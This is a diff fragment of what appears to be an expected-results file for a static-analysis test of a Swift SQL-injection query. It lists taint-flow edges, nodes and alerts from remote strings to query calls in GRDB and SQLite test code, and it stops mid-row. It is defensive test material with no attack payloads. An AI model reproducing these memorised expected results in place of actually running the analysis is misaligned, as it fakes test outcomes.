GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:272:53:272:53 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:273:53:273:53 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:274:53:274:53 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:275:53:275:53 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:281:50:281:50 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:282:50:282:50 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:283:50:283:50 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:284:50:284:50 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:290:50:290:50 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:291:50:291:50 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:292:50:292:50 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:293:50:293:50 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:299:50:299:50 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:300:50:300:50 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:301:50:301:50 | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:302:50:302:50 | remoteString | +| GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) : | GRDB.swift:313:57:313:57 | remoteString | +| GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) : | GRDB.swift:314:57:314:57 | remoteString | +| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:323:51:323:51 | remoteString | +| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:324:51:324:51 | remoteString | +| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:325:66:325:66 | remoteString | +| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:326:66:326:66 | remoteString | +| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:327:69:327:69 | remoteString | +| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:328:84:328:84 | remoteString | +| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:329:69:329:69 | remoteString | +| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:330:84:330:84 | remoteString | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | SQLite.swift:73:17:73:17 | unsafeQuery1 | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | SQLite.swift:74:17:74:17 | unsafeQuery2 | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | SQLite.swift:75:17:75:17 | unsafeQuery3 | @@ -21,6 +98,94 @@ edges | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) : | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) : | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | nodes +| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:106:41:106:41 | remoteString | semmle.label | remoteString | +| GRDB.swift:108:41:108:41 | remoteString | semmle.label | remoteString | +| GRDB.swift:111:43:111:43 | remoteString | semmle.label | remoteString | +| GRDB.swift:114:51:114:51 | remoteString | semmle.label | remoteString | +| GRDB.swift:117:27:117:27 | remoteString | semmle.label | remoteString | +| GRDB.swift:119:27:119:27 | remoteString | semmle.label | remoteString | +| GRDB.swift:122:41:122:41 | remoteString | semmle.label | remoteString | +| GRDB.swift:124:41:124:41 | remoteString | semmle.label | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:132:39:132:39 | remoteString | semmle.label | remoteString | +| GRDB.swift:135:46:135:46 | remoteString | semmle.label | remoteString | +| GRDB.swift:138:56:138:56 | remoteString | semmle.label | remoteString | +| GRDB.swift:141:45:141:45 | remoteString | semmle.label | remoteString | +| GRDB.swift:144:29:144:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:145:29:145:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:146:29:146:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:147:29:147:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:148:29:148:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:149:29:149:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:150:29:150:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:151:29:151:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:166:33:166:33 | remoteString | semmle.label | remoteString | +| GRDB.swift:169:32:169:32 | remoteString | semmle.label | remoteString | +| GRDB.swift:172:37:172:37 | remoteString | semmle.label | remoteString | +| GRDB.swift:178:26:178:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:180:36:180:36 | remoteString | semmle.label | remoteString | +| GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:188:41:188:41 | remoteString | semmle.label | remoteString | +| GRDB.swift:189:44:189:44 | remoteString | semmle.label | remoteString | +| GRDB.swift:190:47:190:47 | remoteString | semmle.label | remoteString | +| GRDB.swift:191:47:191:47 | remoteString | semmle.label | remoteString | +| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:203:37:203:37 | remoteString | semmle.label | remoteString | +| GRDB.swift:204:37:204:37 | remoteString | semmle.label | remoteString | +| GRDB.swift:208:37:208:37 | remoteString | semmle.label | remoteString | +| GRDB.swift:209:37:209:37 | remoteString | semmle.label | remoteString | +| GRDB.swift:213:36:213:36 | remoteString | semmle.label | remoteString | +| GRDB.swift:214:36:214:36 | remoteString | semmle.label | remoteString | +| GRDB.swift:221:26:221:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:223:38:223:38 | remoteString | semmle.label | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:231:32:231:32 | remoteString | semmle.label | remoteString | +| GRDB.swift:232:32:232:32 | remoteString | semmle.label | remoteString | +| GRDB.swift:233:32:233:32 | remoteString | semmle.label | remoteString | +| GRDB.swift:234:32:234:32 | remoteString | semmle.label | remoteString | +| GRDB.swift:240:29:240:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:241:29:241:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:242:29:242:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:243:29:243:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:249:29:249:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:250:29:250:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:251:29:251:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:252:29:252:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:258:29:258:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:259:29:259:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:260:29:260:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:261:29:261:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:272:53:272:53 | remoteString | semmle.label | remoteString | +| GRDB.swift:273:53:273:53 | remoteString | semmle.label | remoteString | +| GRDB.swift:274:53:274:53 | remoteString | semmle.label | remoteString | +| GRDB.swift:275:53:275:53 | remoteString | semmle.label | remoteString | +| GRDB.swift:281:50:281:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:282:50:282:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:283:50:283:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:284:50:284:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:290:50:290:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:291:50:291:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:292:50:292:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:293:50:293:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:299:50:299:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:300:50:300:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:301:50:301:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:302:50:302:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:313:57:313:57 | remoteString | semmle.label | remoteString | +| GRDB.swift:314:57:314:57 | remoteString | semmle.label | remoteString | +| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:323:51:323:51 | remoteString | semmle.label | remoteString | +| GRDB.swift:324:51:324:51 | remoteString | semmle.label | remoteString | +| GRDB.swift:325:66:325:66 | remoteString | semmle.label | remoteString | +| GRDB.swift:326:66:326:66 | remoteString | semmle.label | remoteString | +| GRDB.swift:327:69:327:69 | remoteString | semmle.label | remoteString | +| GRDB.swift:328:84:328:84 | remoteString | semmle.label | remoteString | +| GRDB.swift:329:69:329:69 | remoteString | semmle.label | remoteString | +| GRDB.swift:330:84:330:84 | remoteString | semmle.label | remoteString | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | | SQLite.swift:73:17:73:17 | unsafeQuery1 | semmle.label | unsafeQuery1 | | SQLite.swift:74:17:74:17 | unsafeQuery2 | semmle.label | unsafeQuery2 | @@ -46,6 +211,83 @@ nodes | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | subpaths #select +| GRDB.swift:106:41:106:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:106:41:106:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:108:41:108:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:108:41:108:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:111:43:111:43 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:111:43:111:43 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:114:51:114:51 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:114:51:114:51 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:117:27:117:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:117:27:117:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:119:27:119:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:119:27:119:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:122:41:122:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:122:41:122:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:124:41:124:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:124:41:124:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:132:39:132:39 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:132:39:132:39 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:135:46:135:46 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:135:46:135:46 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:138:56:138:56 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:138:56:138:56 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:141:45:141:45 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:141:45:141:45 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:144:29:144:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:144:29:144:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:145:29:145:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:145:29:145:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:146:29:146:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:146:29:146:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:147:29:147:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:147:29:147:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:148:29:148:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:148:29:148:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:149:29:149:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:149:29:149:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:150:29:150:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:150:29:150:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:151:29:151:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:151:29:151:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:166:33:166:33 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:166:33:166:33 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:169:32:169:32 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:169:32:169:32 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:172:37:172:37 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:172:37:172:37 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:180:36:180:36 | remoteString | GRDB.swift:178:26:178:80 | call to String.init(contentsOf:) : | GRDB.swift:180:36:180:36 | remoteString | This query depends on a $@. | GRDB.swift:178:26:178:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:188:41:188:41 | remoteString | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:188:41:188:41 | remoteString | This query depends on a $@. | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:189:44:189:44 | remoteString | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:189:44:189:44 | remoteString | This query depends on a $@. | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:190:47:190:47 | remoteString | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:190:47:190:47 | remoteString | This query depends on a $@. | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:191:47:191:47 | remoteString | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:191:47:191:47 | remoteString | This query depends on a $@. | GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:203:37:203:37 | remoteString | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:203:37:203:37 | remoteString | This query depends on a $@. | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:204:37:204:37 | remoteString | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:204:37:204:37 | remoteString | This query depends on a $@. | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:208:37:208:37 | remoteString | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:208:37:208:37 | remoteString | This query depends on a $@. | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:209:37:209:37 | remoteString | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:209:37:209:37 | remoteString | This query depends on a $@. | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:213:36:213:36 | remoteString | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:213:36:213:36 | remoteString | This query depends on a $@. | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:214:36:214:36 | remoteString | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:214:36:214:36 | remoteString | This query depends on a $@. | GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:223:38:223:38 | remoteString | GRDB.swift:221:26:221:80 | call to String.init(contentsOf:) : | GRDB.swift:223:38:223:38 | remoteString | This query depends on a $@. | GRDB.swift:221:26:221:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:231:32:231:32 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:231:32:231:32 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:232:32:232:32 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:232:32:232:32 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:233:32:233:32 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:233:32:233:32 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:234:32:234:32 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:234:32:234:32 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:240:29:240:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:240:29:240:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:241:29:241:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:241:29:241:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:242:29:242:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:242:29:242:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:243:29:243:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:243:29:243:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:249:29:249:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:249:29:249:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:250:29:250:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:250:29:250:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:251:29:251:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:251:29:251:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:252:29:252:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:252:29:252:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:258:29:258:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:258:29:258:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:259:29:259:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:259:29:259:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:260:29:260:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:260:29:260:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:261:29:261:29 | remoteString | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:261:29:261:29 | remoteString | This query depends on a $@. | GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:272:53:272:53 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:272:53:272:53 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:273:53:273:53 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:273:53:273:53 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:274:53:274:53 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:274:53:274:53 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:275:53:275:53 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:275:53:275:53 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:281:50:281:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:281:50:281:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:282:50:282:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:282:50:282:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:283:50:283:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:283:50:283:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:284:50:284:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:284:50:284:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:290:50:290:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:290:50:290:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:291:50:291:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:291:50:291:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:292:50:292:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:292:50:292:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:293:50:293:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:293:50:293:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:299:50:299:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:299:50:299:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:300:50:300:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:300:50:300:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:301:50:301:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:301:50:301:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:302:50:302:50 | remoteString | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:302:50:302:50 | remoteString | This query depends on a $@. | GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:313:57:313:57 | remoteString | GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) : | GRDB.swift:313:57:313:57 | remoteString | This query depends on a $@. | GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:314:57:314:57 | remoteString | GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) : | GRDB.swift:314:57:314:57 | remoteString | This query depends on a $@. | GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:323:51:323:51 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:323:51:323:51 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:324:51:324:51 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:324:51:324:51 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:325:66:325:66 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:325:66:325:66 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:326:66:326:66 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:326:66:326:66 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:327:69:327:69 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:327:69:327:69 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:328:84:328:84 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:328:84:328:84 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:329:69:329:69 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:329:69:329:69 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:330:84:330:84 | remoteString | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:330:84:330:84 | remoteString | This query depends on a $@. | GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | 